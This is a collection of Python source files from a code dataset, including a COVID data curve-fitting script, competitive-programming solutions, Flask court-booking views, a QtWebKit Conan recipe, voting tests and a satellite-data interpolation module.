getDeaths(startrad, sluttrad):\n getNumbers(sheetD, 1, deaths, startrad, sluttrad)\n\n\n# Metode som henter antall dager fra excel-dataene innenfor spesifisert periode\ndef getDays(startrad, sluttrad):\n for i in range(sheetD.nrows):\n if i < startrad:\n print()\n elif i <= sluttrad:\n days.append(i)\n\n\n# ----------- Metoder som henter data fra excel-ark SLUTT------------\n\n\n# Metode som interpolerer data for dødsfall til en kontinuerlig funksjon\ndef D(t):\n return np.interp(np.array(t), days, deaths)\n\n\n# Metode som interpolerer data for innlagte til en kontinuerlig funksjon\ndef K(t):\n return np.interp(np.array(t), days, innlagt)\n\n\n# Metode som setter opp funksjonen for C(k, d)\ndef CFunction(vektor, k, d, T):\n kVektor = k * K(vektor - d)\n dVektor = D(vektor)\n return (np.trapz((kVektor - dVektor) ** 2, vektor)) / (T - d)\n\n\ndef plotCostFunction(vektor, periode, iterasjoner, start, slutt):\n # Vektorer med parameterverdier\n global dMin, kMin\n n = 100\n kRange = np.array(np.linspace(0, 0.05, n))\n dRange = np.array(np.linspace(0, 60, n))\n iter = 0\n\n # Finner minste verdi for C med k og d\n CMin = 1000000\n for k in kRange:\n for d in dRange:\n C = CFunction(vektor, k, d,\n periode) # Kaller på funksjonen for C som regner ut eventuelle nye minimums C-er\n if C < CMin: # Hvis funksjonen får en lavere C angir vi nye C, k og d til de nye verdiene\n CMin = C\n kMin = k\n dMin = d\n print(\"k: \" + str(kMin) + \"\\td: \" + str(dMin) + \"\\tCMin: \" + str(\n CMin)) # Skriver ut de nye verdiene til terminalen\n iter = iter + 1\n\n print(\"Done!\")\n\n\n plotvektor = np.array(np.linspace(dMin, periode, iterasjoner))\n # Plotter D(t)\n plt.plot(plotvektor, D(plotvektor))\n # Plotter k*K(t-d)\n plt.plot(plotvektor, kMin * K(plotvektor - dMin))\n\n print(\"k-verdien som gir minst C(k,d) er \" + str(kMin))\n print(\"d-verdien som gir minst C(k,d) er \" + str(dMin))\n plt.title(\"k = \" + str(kMin) + \"\\nd = \" + str(dMin) + \"\\nCMin = \" + str(CMin))\n plt.legend(['D(t)', 'k*K(t-d)'])\n plt.tight_layout()\n plt.show()\n print(\"iterasjoner: \"+str(iter))\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n # Setter hvilken dag vi ønsker å starte perioden fra\n start = 0\n\n # Setter hvilken dag vi ønsker å slutte perioden på\n slutt = 393\n\n # Setter hvor mange dager som dataene blir sett over\n periode = slutt - start + 1\n\n # Angir hvor mange iterasjoner som jeg ønsker å ha for tidsrommet som blir sett på\n iterasjoner = periode * 24\n\n # Oppretter en vektor med parameterene som ble opprettet ovenfor\n vektor = np.array(np.linspace(0, periode, iterasjoner))\n\n # Henter antall dager fra excel ark og legger det i et array\n getDays(0, 393)\n\n # Henter antall innlagte (kumulativt) fra excel ark og legger det i et array\n getInnlagt(0, 393)\n\n # Henter antall døde (kumulativt) fra excel ark og legger det i et array\n getDeaths(0, 393)\n\n # Starter utregningsprosessen og plottingen av dataene\n plotCostFunction(vektor, periode, iterasjoner, start, slutt)\n\n print(\"-------- %s seconds --------\" % (time.time()-start_time))\n","sub_path":"Henrik/unused/bruteforceSolve.py","file_name":"bruteforceSolve.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"326638466","text":"import sys\nsys.stdin=open(\"input.txt\",\"r\")\nfrom collections import deque\n\ndef bfs():\n while(q):\n a,b=q.popleft()\n visited[a]=True\n if a==m:\n print(b)\n break\n\n #세가지 경우 추가\n if a+1<=100000 and visited[a+1]==False:\n q.append([a+1,b+1])\n if a-1>=0 and visited[a-1]==False:\n q.append([a-1,b+1])\n if 2*a<=100000 and visited[a*2]==False:\n q.append([2*a,b+1])\n \n\nn,m=map(int,input().split())\n\nvisited=[False for _ in range(100001)]\nq=deque()\nq.append([n,0]) #초기 위치와 횟수저장\nif n>=m:\n print(n-m)\nelse:\n bfs()\n\n","sub_path":"practice/1697(bfs).py","file_name":"1697(bfs).py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"227619534","text":"from matcher import *\r\nimport os\r\n\r\nclass inputParser:\r\n @staticmethod\r\n def prefixSeparator(splittedText):\r\n i = 0\r\n while(i < len(splittedText)):\r\n temp = splittedText[i]\r\n wordLength = len(temp)\r\n j, needSplit = 0, False\r\n while(j < wordLength and not temp[j].isalpha()):\r\n j, needSplit = j + 1, True\r\n if(j < wordLength and needSplit):\r\n del splittedText[i]\r\n splittedText.insert(i, temp[0:j])\r\n splittedText.insert(i + 1, \"<=>\")\r\n splittedText.insert(i + 2, temp[j:wordLength])\r\n i += 3\r\n else:\r\n i += 1\r\n return splittedText\r\n \r\n @staticmethod\r\n def suffixSeparator(splittedText):\r\n # specialChar = ['.', ',', '!', '?',')', '(', \"'\", \"\\\"\",\\\r\n # '{', '}', '[', ']', '@', '&']\r\n i = 0\r\n while(i < len(splittedText)):\r\n temp = splittedText[i]\r\n wordLength = len(temp)\r\n j, needSplit = wordLength - 1, False\r\n while(j >= 0 and not temp[j].isalpha()):\r\n j, needSplit = j - 1, True\r\n if(j >= 0 and needSplit):\r\n del splittedText[i]\r\n splittedText.insert(i, temp[0:j + 1])\r\n splittedText.insert(i + 1, \"<=>\")\r\n splittedText.insert(i + 2, temp[j + 1:wordLength])\r\n i += 3\r\n else:\r\n i += 1\r\n return splittedText\r\n \r\n @staticmethod\r\n def decode(text):\r\n decodedText, i, textLength = \"\", 0, len(text)\r\n while(i < textLength):\r\n decodedText += text[i]\r\n if i != textLength - 1 and text[i + 1] != \"<=>\":\r\n decodedText += \" \"\r\n i += 1\r\n else:\r\n i += 2\r\n return decodedText\r\n\r\n @staticmethod\r\n def deleteEncoding(text):\r\n return [word for word in text if word != \"<=>\"]\r\n\r\nclass LibParser:\r\n class Entry:\r\n def __init__(self, entry):\r\n entry = entry.split(' = ')\r\n self.key = entry[0]\r\n self.data = entry[1]\r\n self.keyLength = len(entry[0].split(\" \"))\r\n\r\n def __init__(self, indo=\"../data/indonesia.txt\", sunda=\"../data/sunda.txt\",\\\r\n removedWordsSunda = [\"teh\"], removedWordsIndo = []):\r\n if not os.path.isfile(indo) or not os.path.isfile(indo):\r\n print('File does not exist.')\r\n exit(1)\r\n else:\r\n with open(indo) as i:\r\n self.vocabIndo = i.read().splitlines()\r\n self.removedWordsIndo = removedWordsIndo\r\n temp = []\r\n for i in self.vocabIndo:\r\n temp.append(LibParser.Entry(i))\r\n self.vocabIndo = sorted(temp, key = lambda x : x.keyLength, reverse = True)\r\n\r\n with open(sunda) as s:\r\n self.vocabSunda = s.read().splitlines()\r\n self.removedWordsSunda = removedWordsSunda\r\n temp = []\r\n for i in self.vocabSunda:\r\n temp.append(LibParser.Entry(i))\r\n self.vocabSunda = sorted(temp, key = lambda x : x.keyLength, reverse = True)\r\n\r\nif __name__=='__main__':\r\n p = LibParser()\r\n for i in p.vocabIndo:\r\n print(i.keyLength)\r\n\r\n","sub_path":"src/stringParser.py","file_name":"stringParser.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"583378406","text":"\"\"\"Threadpools are an easy and convenient way to run in threads\"\"\"\nimport concurrent.futures\nimport requests\nimport time\nfrom pathlib import Path\nimport threading\n\nSTATUS_REPORT = Path(\"status_report.txt\")\nSTATUS_REPORT.write_text(\"\")\nREPORT_LOCK = threading.Lock()\n\ndef get_status(url):\n print(f\"Getting status of {url}\")\n start_time = time.monotonic()\n response = requests.get(url)\n total_time = time.monotonic() - start_time\n print(f\"Finished getting status of {url} in {total_time:.2f} seconds\")\n with REPORT_LOCK:\n current_text = STATUS_REPORT.read_text()\n STATUS_REPORT.write_text(f\"{current_text}{url}: {response.status_code}\\n\")\n return url, response.status_code\n\nurls = [\n \"https://www.google.com\",\n \"https://www.facebook.com\",\n \"https://www.twitter.com\",\n \"https://www.github.com\",\n \"https://www.linkedin.com\"\n]\n\nwith concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\n futures = []\n for url in urls:\n future = executor.submit(get_status, url)\n futures.append(future)\n\n for future in concurrent.futures.as_completed(futures):\n try:\n url, code = future.result()\n print(f\"Status code for {url} is {code}\")\n except Exception as err:\n print(f\"Task failed! {err}\")\n","sub_path":"Python/threading/site_status.py","file_name":"site_status.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"537884049","text":"\"\"\"\nViews for slots\n\"\"\"\n\nimport cala.auth\n\nfrom flask import redirect, url_for, render_template, request, flash\nfrom sqlalchemy.exc import IntegrityError\n\nfrom cala.database import db_session\nfrom cala.decorators import requires_role\nfrom cala.models import Court, Slot, User, BookedSlot\nfrom ..cala import app\n\n\n@app.route('/slots')\n@requires_role('admin')\ndef list_slots():\n all_slots = Slot.query.join(Court).order_by(Court.name).\\\n order_by(Slot.weekday).order_by(Slot.time_start).\\\n all()\n slots = {}\n for elem in all_slots:\n if elem.court.name not in slots:\n slots[elem.court.name] = []\n slots[elem.court.name].append(elem)\n return render_template('slots/list.html', court_names=sorted(slots.keys()), slots=slots)\n\n\n@app.route('/slots/add', methods=['GET', 'POST'])\n@requires_role('admin')\ndef add_slot():\n if request.method == 'GET':\n courts = Court.query.order_by(Court.name).all()\n return render_template('slots/add.html', courts=courts)\n if request.method == 'POST':\n court_id = request.form.get('court_id', None)\n court = Court.query.get(court_id)\n slot = Slot(court=court,\n weekday=request.form.get('weekday', None),\n time_start=request.form.get('time_start', None),\n time_end=request.form.get('time_end', None))\n db_session.add(slot)\n try:\n db_session.commit()\n except IntegrityError:\n error = 'Slot could not be added'\n db_session.rollback()\n return render_template('slots/add.html',\n error=error,\n court_id=court_id,\n weekday=weekday,\n time_start=time_start,\n time_end=time_end)\n flash(\"Slot '%s' has been added\" % str(slot))\n return redirect(url_for('list_slots'))\n\n\n@app.route('/slots/edit/<int:slot_id>', methods=['GET', 'POST'])\n@requires_role('admin')\ndef edit_slot(slot_id):\n slot = Slot.query.get(slot_id)\n if request.method == 'GET':\n courts = Court.query.order_by(Court.name).all()\n return render_template('slots/edit.html', courts=courts, slot=slot)\n if request.method == 'POST':\n slot.court = Court.query.get(request.form.get('court_id', None))\n slot.weekday = request.form.get('weekday', None)\n slot.time_start = request.form.get('time_start', None)\n slot.time_end = request.form.get('time_end', None)\n try:\n db_session.commit()\n except IntegrityError as exc:\n error = \"Could not save changes\"\n db_session.rollback()\n return render_template('slots/edit.html',\n error=error,\n slot=slot)\n flash(\"Slot '%s' has been saved\" % str(slot))\n return redirect(url_for('list_slots'))\n\n\n@app.route('/slots/delete/<int:slot_id>', methods=['GET', 'POST'])\n@requires_role('admin')\ndef delete_slot(slot_id):\n slot = Slot.query.get(slot_id)\n if request.method == 'GET':\n return render_template('slots/delete.html', slot=slot)\n if request.method == 'POST':\n slot_label = str(slot) # after deleting we could otherwise not do str(slot)\n if request.form.get('confirm_delete', None) != 'yes':\n error = 'Confirmation required to prevent accidental deletion'\n return render_template('slots/delete.html',\n error=error,\n slot=slot)\n db_session.delete(slot)\n try:\n db_session.commit()\n except IntegrityError:\n error = \"Could not delete slot '%s'\" % slot_label\n db_session.rollback()\n return render_template('slots/delete.html',\n error=error,\n slot=slot)\n flash(\"Slot '%s' has been deleted\" % slot_label)\n return redirect(url_for('list_slots'))\n\n\n@app.route('/slots/book/<int:slot_id>/<string:date_str>', methods=['GET', 'POST'])\n@requires_role('user')\ndef book_slot(slot_id, date_str):\n if date_str < cala.time.format_date():\n flash('The date you tried to book is in the past')\n return redirect(url_for('show_week', start_date=cala.time.first_of_week(date_str)))\n\n slot = Slot.query.get(slot_id)\n booked_slot = BookedSlot.query.filter_by(slot_id=slot_id).\\\n filter_by(booked_date=date_str).first()\n if booked_slot is not None:\n flash('Slot already booked by %s' % booked_slot.booked_by_user.email)\n return redirect(url_for('show_week', start_date=date_str))\n current_user = cala.auth.get_user()\n if request.method == 'GET':\n users = User.query.order_by(User.name).order_by(User.email).all()\n return render_template('slots/book.html',\n date_str=date_str,\n slot=slot,\n booked_slot=booked_slot,\n users=users,\n current_user=current_user)\n if request.method == 'POST':\n players = [User.query.get(request.form.get('player_1_id', None)),\n User.query.get(request.form.get('player_2_id', None)),\n User.query.get(request.form.get('player_3_id', None)),\n User.query.get(request.form.get('player_4_id', None))]\n booked_slot = cala.businesslogic.book_slot(slot, date_str, players)\n db_session.add(booked_slot)\n try:\n db_session.commit()\n except:\n error = \"Could not book slot\"\n db_session.rollback()\n return render_template('slots/book.html',\n error=error,\n date_str=date_str,\n slot=slot,\n booked_slot=booked_slot,\n users=users,\n current_user=current_user)\n flash(\"Booked '%s' on %s (%s - %s)\" % (slot.court.name,\n date_str,\n slot.time_start,\n slot.time_end))\n return redirect(url_for('show_week', start_date=cala.time.first_of_week(date_str)))\n\n\n@app.route('/slots/booked/delete/<int:booked_slot_id>', methods=['GET', 'POST'])\n@requires_role('user', 'admin')\ndef delete_booked_slot(booked_slot_id):\n booked_slot = BookedSlot.query.get(booked_slot_id)\n if not booked_slot:\n flash('No booked slot found')\n return redirect(url_for('show_week'))\n if not cala.auth.can_user_delete_booked_slot(booked_slot):\n flash('You are not allowed to delete this booking')\n return redirect(url_for('show_week', start_date=booked_slot.booked_date))\n if request.method == 'GET':\n return render_template('slots/delete_booked_slot.html', booked_slot=booked_slot)\n if request.method == 'POST':\n the_date = booked_slot.booked_date\n if request.form.get('confirm_delete', None) != 'yes':\n error = 'Confirmation required to prevent accidental deletion'\n return render_template('slots/delete_booked_slot.html',\n error=error,\n booked_slot=booked_slot)\n db_session.delete(booked_slot)\n try:\n db_session.commit()\n except IntegrityError:\n error = \"Could not delete booking\"\n db_session.rollback()\n return render_template('slots/delete_booked_slot.html',\n error=error,\n booked_slot=booked_slot)\n flash(\"Slot booking has been deleted\")\n return redirect(url_for('show_week', start_date=the_date))\n\n\n@app.route('/slots/booked/edit/<int:booked_slot_id>', methods=['GET', 'POST'])\n@requires_role('user', 'admin')\ndef edit_booked_slot(booked_slot_id):\n booked_slot = BookedSlot.query.get(booked_slot_id)\n if not booked_slot:\n flash('No booked slot found')\n return redirect(url_for('show_week'))\n if not cala.auth.can_user_edit_booked_slot(booked_slot):\n flash('You are not allowed to edit this booking')\n return redirect(url_for('show_week', start_date=booked_slot.booked_date))\n users = User.query.order_by(User.name).order_by(User.email).all()\n if request.method == 'GET':\n return render_template('slots/edit_booked_slot.html', booked_slot=booked_slot, users=users)\n if request.method == 'POST':\n cala.businesslogic.change_players(booked_slot,\n [booked_slot.player_1,\n Users.query.get(request.form.get('player_2_id', None)),\n Users.query.get(request.form.get('player_3_id', None)),\n Users.query.get(request.form.get('player_4_id', None))])\n try:\n db_session.commit()\n except IntegrityError:\n error = \"Could not change booking\"\n db_session.rollback()\n return render_template('slots/edit_booked_slot.html',\n error=error,\n booked_slot=booked_slot,\n users=users)\n flash(\"Slot booking has been changed\")\n return redirect(url_for('show_week', start_date=booked_slot.booked_date))\n","sub_path":"cala/views/slots.py","file_name":"slots.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"98920471","text":"\n\nfrom xai.brain.wordbase.adverbs._super import _SUPER\n\n#calss header\nclass _SUPERS(_SUPER, ):\n\tdef __init__(self,): \n\t\t_SUPER.__init__(self)\n\t\tself.name = \"SUPERS\"\n\t\tself.specie = 'adverbs'\n\t\tself.basic = \"super\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adverbs/_supers.py","file_name":"_supers.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212238458","text":"from conans import ConanFile, CMake, tools\nimport os\nimport platform\n\n\nclass QtWebKitConan(ConanFile):\n name = \"qtwebkit\"\n version = \"5.212.0-alpha4\"\n license = \"LGPL-2.0-or-later, LGPL-2.1-or-later, BSD-2-Clause\"\n homepage = \"https://github.com/qtwebkit/qtwebkit\"\n description = \"Qt port of WebKit\"\n topics = (\"qt\", \"browser-engine\", \"webkit\", \"qt5\", \"qml\", \"qtwebkit\")\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n generators = 'cmake'\n exports_sources = [\n \"clang-11-jsc.patch\",\n ]\n _source_subfolder = \"source_subfolder\"\n _build_subfolder = \"build_subfolder\"\n\n options = {\n \"with_bmalloc\": [True, False],\n \"with_geolocation\": [True, False],\n \"with_gstreamer\": [True, False],\n \"with_libhyphen\": [True, False],\n \"with_webcrypto\": [True, False],\n \"with_webkit2\": [True, False],\n \"with_woff2\": [True, False]\n }\n\n default_options = {\n \"icu:shared\": True,\n\n \"libxml2:shared\": True,\n \"libxslt:shared\": True,\n\n \"libjpeg-turbo:shared\": False,\n \"zlib:shared\": False,\n \"libpng:shared\": False,\n \"sqlite3:shared\": False,\n \"libwebp:shared\": False,\n\n \"with_bmalloc\": False,\n\n \"with_geolocation\": False,\n \"with_gstreamer\": False,\n \"with_libhyphen\": False,\n \"with_webcrypto\": False,\n \"with_webkit2\": False,\n \"with_woff2\": False,\n\n \"qt:qtsvg\": True,\n \"qt:qtx11extras\": platform.system() == \"Linux\",\n \"qt:qtimageformats\": True,\n \"qt:qtscript\": True,\n \"qt:qttools\": True,\n \"qt:qtmultimedia\" : True,\n\n \"qt:with_glib\": False,\n \"qt:with_harfbuzz\": False,\n \"qt:with_icu\": False,\n \"qt:with_pcre2\": False,\n \"qt:with_mysql\": False,\n \"qt:with_sdl2\": False,\n \"qt:with_zstd\": False\n }\n\n requires = (\n \"qt/5.14.1\",\n \"libjpeg-turbo/2.0.4\",\n \"libpng/1.6.37\",\n \"libwebp/1.1.0\",\n \"sqlite3/3.31.0\",\n \"icu/64.2\",\n \"libxml2/2.9.9\",\n \"libxslt/1.1.33\",\n \"zlib/1.2.11\"\n )\n\n def build_requirements(self):\n pass\n\n def requirements(self):\n if self.options[\"with_webcrypto\"]:\n self.requires(\"libgcrypt/1.8.4@bincrafters/stable\")\n\n if self.options[\"with_gstreamer\"]:\n self.requires[\"gstreamer/1.16.0@bincrafters/stable\"]\n\n if self.options[\"with_libhyphen\"]:\n pass # TODO add dependency when somebody will write receipt for libhyphen\n\n if self.options[\"with_woff2\"]:\n pass # TODO wait until https://github.com/qtwebkit/conan-woff2 will be deployed on bintray\n\n def source(self):\n tools.get(f'{self.homepage}/releases/download/{self.name}-{self.version}/{self.name}-{self.version}.tar.xz',\n sha256='9ca126da9273664dd23a3ccd0c9bebceb7bb534bddd743db31caf6a5a6d4a9e6')\n os.rename(f'{self.name}-{self.version}', self._source_subfolder)\n\n # check recipe conistency\n tools.check_with_algorithm_sum(\"sha1\", \"clang-11-jsc.patch\", \"c8d0b0c68f96b58e07c22276086ac9007cc761e2\")\n\n # apply patches\n if tools.is_apple_os(self.settings.os):\n tools.patch(base_path = self._source_subfolder, patch_file = \"clang-11-jsc.patch\", strip = 1)\n\n def _configure_cmake(self):\n cmake = CMake(self)\n\n cmake.definitions[\"PORT\"] = \"Qt\"\n cmake.definitions[\"ENABLE_DEVICE_ORIENTATION\"] = \"OFF\"\n cmake.definitions[\"ENABLE_TEST_SUPPORT\"] = \"OFF\"\n\n # TODO on linux we should check kernel version. On kernels < 3.4 bmalloc cannot be compiled\n if not self.options[\"with_bmalloc\"]:\n cmake.definitions[\"USE_SYSTEM_MALLOC\"] = \"ON\"\n if not self.options[\"with_geolocation\"]:\n # TODO check if QtLocation module was built\n cmake.definitions[\"ENABLE_GEOLOCATION\"] = \"OFF\"\n if not self.options[\"with_gstreamer\"]:\n cmake.definitions[\"USE_GSTREAMER\"] = \"OFF\"\n if not self.options[\"with_libhyphen\"]:\n cmake.definitions[\"USE_LIBHYPHEN\"] = \"OFF\"\n if not self.options[\"with_webcrypto\"]:\n cmake.definitions[\"ENABLE_WEB_CRYPTO\"] = \"OFF\"\n if not self.options[\"with_webkit2\"]:\n cmake.definitions[\"ENABLE_WEBKIT2\"] = \"OFF\"\n cmake.definitions[\"ENABLE_QT_GESTURE_EVENTS\"] = \"OFF\"\n if not self.options[\"with_woff2\"]:\n cmake.definitions[\"USE_WOFF2\"] = \"OFF\"\n\n cmake.definitions[\"QT_CONAN_DIR\"] = os.getcwd()\n\n qt_dir = self.deps_cpp_info[\"qt\"]\n cmake.definitions[\"Qt5_DIR\"] = os.path.join(qt_dir.libdirs[0], \"cmake\", \"Qt5\")\n\n cmake.configure(build_folder=self._build_subfolder, source_folder=self._source_subfolder)\n\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n cmake.install()\n\n def package(self):\n pass\n\n def package_info(self):\n if tools.is_apple_os(self.settings.os):\n libs = [\n \"QtWebKit\",\n \"QtWebKitWidgets\"\n ]\n self.cpp_info.frameworkdirs = ['lib']\n self.cpp_info.frameworks = [lib for lib in libs]\n else:\n libs = [\n \"Qt5WebKit\",\n \"Qt5WebKitWidgets\"\n ]\n self.cpp_info.libdirs.append('lib')\n self.cpp_info.libs = [lib for lib in libs]\n self.env_info.CMAKE_PREFIX_PATH.append(self.package_folder)\n","sub_path":"recipes/qtwebkit/5.212.0-alpha4/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"615285145","text":"# to exit the program when the user input is not correct\nimport sys\ntry:\n t = int(input())\n # test input in these allowed limits\n if t>=1 and t<=300:\n pass\n else:\n # exit the program if not\n raise sys.exit()\nexcept:\n # exit when no input is given\n # and this catches EOF(end of file) exception\n sys.exit()\n\n# Initialize N,M,Q to keep track of the sum of n,m,q\n# (should not exceed 3*10**5)\nN,M,Q = 0,0,0\n# iterate over test cases\nwhile(t):\n t -= 1\n try:\n n,m,q = map(int,input().split())\n # if values of n,m,q out of constraint then exit.\n if n<1 or n>10**5 or m<1 or m>10**5 or q<1 or q>10**5:\n raise sys.exit()\n # catches EOF exception\n except:\n sys.exit()\n # as explained above\n N += n\n M += m\n Q += q\n\n # if the sum exceeds 3*10**5, stop execution\n if N > 3*(10**5) or M > 3*(10**5) or Q > 3*(10**5):\n raise sys.exit()\n\n # dictionary to keep track of which row,col gets repeated\n # and how many times\n row, col = {},{}\n # intialized to zero\n num_odd_row, num_odd_col = 0,0\n\n # iterate all the operations\n while q:\n q -= 1\n try:\n # r for row and c for column\n r,c = map(int,input().split())\n # if r and c out of matrix dimentions\n # then exit program\n if r<1 or r>n or c<1 or c>m:\n raise sys.exit()\n # catches eof exception\n except:\n sys.exit()\n\n # checks if the row is already in row or col dictionary\n # rcheck is boolean value true or false\n rcheck = (r in row.keys())\n # similarly ccheck for col\n ccheck = (c in col.keys())\n\n # if any of row or column is repeated\n if rcheck or ccheck:\n # if both repeated increment both by one\n if rcheck and ccheck:\n col[c] += 1\n row[r] += 1\n # else increment r, is the new row, set it to one\n # and increment c by one\n elif ccheck:\n col[c] += 1\n row[r] = 1\n # else increment c, is the new col, set it to one\n # and increment r by one\n elif rcheck:\n row[r] += 1\n col[c] = 1\n # this will not happen when both r and c are new\n # because the condition doesn't allow\n else:\n pass\n # if both points are new\n else:\n # set r to one\n row[r] = 1\n # set c to one\n col[c] = 1\n\n # number of odd rows or columns\n for i in row.values():\n # dictionary is (key,value) pair\n # for every value in row check if odd\n # if so, increment by one\n if i%2 == 1:\n # counts all odd rows\n num_odd_row += 1\n # same thing for col\n for i in col.values():\n if i%2 == 1:\n num_odd_col += 1\n # total odd points =\n # oddrow * evencol + oddcol * evenrow\n oddpts = (n-num_odd_row)*num_odd_col + (m-num_odd_col)*num_odd_row\n print(oddpts)\n","sub_path":"SAKTEN.py","file_name":"SAKTEN.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"157693336","text":"import json\nfrom unittest.mock import Mock\n\nfrom main import get_dog_pair, submit_vote, get_votes, register_voter\n\n\ndef mock_request(data):\n return Mock(get_json=Mock(return_value=data), args=data)\n\n\ndef test_vote():\n voter_data = {\n \"gender_identity\": \"test\",\n \"age\": 20,\n \"education\": 0,\n \"location\": \"test\",\n \"dog_ownership\": False,\n \"northeastern_relationship\": \"test\",\n }\n\n result = json.loads(register_voter(mock_request(voter_data))[0])\n id1 = result[\"dog1\"]\n id2 = result[\"dog2\"]\n voter_uuid = result[\"voter_uuid\"]\n assert id1 != id2\n\n voteFor1 = {\n \"dog1_id\": id1,\n \"dog2_id\": id2,\n \"winner\": id1,\n \"voter_uuid\": voter_uuid,\n }\n\n def get_votes_dog1(id1, id2):\n return json.loads(get_votes(mock_request({\"id\": id1}))[0]).get(str(id2), {\"wins\": 0, \"losses\": 0, \"ties\": 0})\n\n vote_count = get_votes_dog1(id1, id2)\n submit_vote(mock_request(voteFor1))\n\n vote_count_after = get_votes_dog1(id1, id2)\n\n assert vote_count_after[\"wins\"] == vote_count[\"wins\"] + 1\n assert vote_count_after[\"losses\"] == vote_count[\"losses\"]\n assert vote_count_after[\"ties\"] == vote_count[\"ties\"]\n\n result = json.loads(get_dog_pair(mock_request(voter_uuid))[0])\n id1 = result[\"dog1\"]\n id2 = result[\"dog2\"]\n assert id1 != id2\n\n tie_vote = {\n \"dog1_id\": id1,\n \"dog2_id\": id2,\n \"winner\": -1,\n \"voter_uuid\": voter_uuid,\n }\n\n vote_count = get_votes_dog1(id1, id2)\n submit_vote(mock_request(tie_vote))\n vote_count_after = get_votes_dog1(id1, id2)\n assert vote_count_after[\"wins\"] == vote_count[\"wins\"]\n assert vote_count_after[\"losses\"] == vote_count[\"losses\"]\n assert vote_count_after[\"ties\"] == vote_count[\"ties\"] + 1\n\n\n","sub_path":"functions/test/integration/test_cloud_voting.py","file_name":"test_cloud_voting.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"21348740","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom ask_maksimov.views import *\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n\turl('^signup$', signup, name='signup'),\n\turl('^login$', login, name='login'),\n\turl('^logout$', log_out, name = 'logout'),\n\turl('^profile/edit$', profile_edit, name = 'profile_edit'),\n\turl('^ask_question$', ask_question, name='ask_question'),\n\turl('^hot$', hot, name = 'hot'),\n\turl(r'^to_like$', like, name = 'like'),\n\turl(r'^question/(?P<question_id>\\d+)/((?P<page>\\d+)/?)?', question, name = 'question'),\n\turl(r'^(tag/(?P<tag_value>\\w+)/)?(?P<page>\\d+)?/?', index, name = 'index'),\n]\n","sub_path":"ask_maksimov/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206938929","text":"\"\"\"ADD MODULE DOCSTRING HERE\"\"\"\n\n# Standard Library\nimport logging\nfrom datetime import timedelta\n\n# Third-party\nimport pandas as pd\n\n# Local modules/packages\nfrom .datasets import list_files, get_tbarr\n\n#------------------------------------------------------------------------------#\n\n__all__ = ['interp1d']\n\n#------------------------------------------------------------------------------#\n\nlogger = logging.getLogger(__name__)\n\n#------------------------------------------------------------------------------#\n\ndef interp1d(array):\n \"\"\"Fill in temporal gaps through linear interpolation.\n\n Parameters\n ----------\n array : xarray.DataArray\n 3D array to be filled. Must have a 'time' dimension.\n\n Returns\n -------\n array_filled: xarray.DataArray\n Description\n\n Raises\n ------\n SystemExit\n Description\n \"\"\"\n dates = array['time'].to_index()\n if dates.has_duplicates:\n logging.error('Dates must be unique. Found duplicates.')\n raise SystemExit\n\n dates_all = pd.date_range(\n start=dates.min(),\n end=dates.max(),\n freq='D')\n array_filled = array.reindex(indexers={'time': dates_all})\n dates_all = dates_all\n dates_present = dates\n dates_missing = set(dates_all) - set(dates_present)\n dates_missing = sorted(list(dates_missing))\n\n if dates_missing:\n\n logger.debug('Found the following gaps:')\n for date in dates_missing:\n logger.debug('%11s', date.strftime('%Y-%m-%d'))\n\n logger.debug('Interpolating:')\n for date in dates_missing:\n prev_day = date - timedelta(days=1)\n next_day = date + timedelta(days=1)\n if set([prev_day, next_day]).issubset(dates_present):\n logger.debug(' Filling %s', date.strftime('%Y-%m-%d'))\n array_filled.loc[date] = (array_filled.loc[prev_day] + \\\n array_filled.loc[next_day]) * 0.5\n else:\n logger.debug(' Skipping %s', date.strftime('%Y-%m-%d'))\n\n return array_filled\n else:\n logger.debug('Record complete. No interpolation needed.')\n return array\n\n#------------------------------------------------------------------------------#\n","sub_path":"packages/nsidc/interp.py","file_name":"interp.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515005708","text":"# Created by Jae Sung Kim (The Pennsylvania State University Libraries).\n# Last modified: 08/31/21\n# Example of running: python3 bba_nr.py io_nr.txt fiducial_mark.txt EO_init_1.txt control.txt bba_result_nr_1.txt 1 2 1 control_uncertainty.txt \n# 1 2 1: 1 control, 2 check, 1 correction for atmospheric refraction\n# The unit of ground space coordinate is assumed to be feet.\n\n\"\"\"\nMIT License\n\nCopyright (c) 2021 Penn State University Libraries\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, 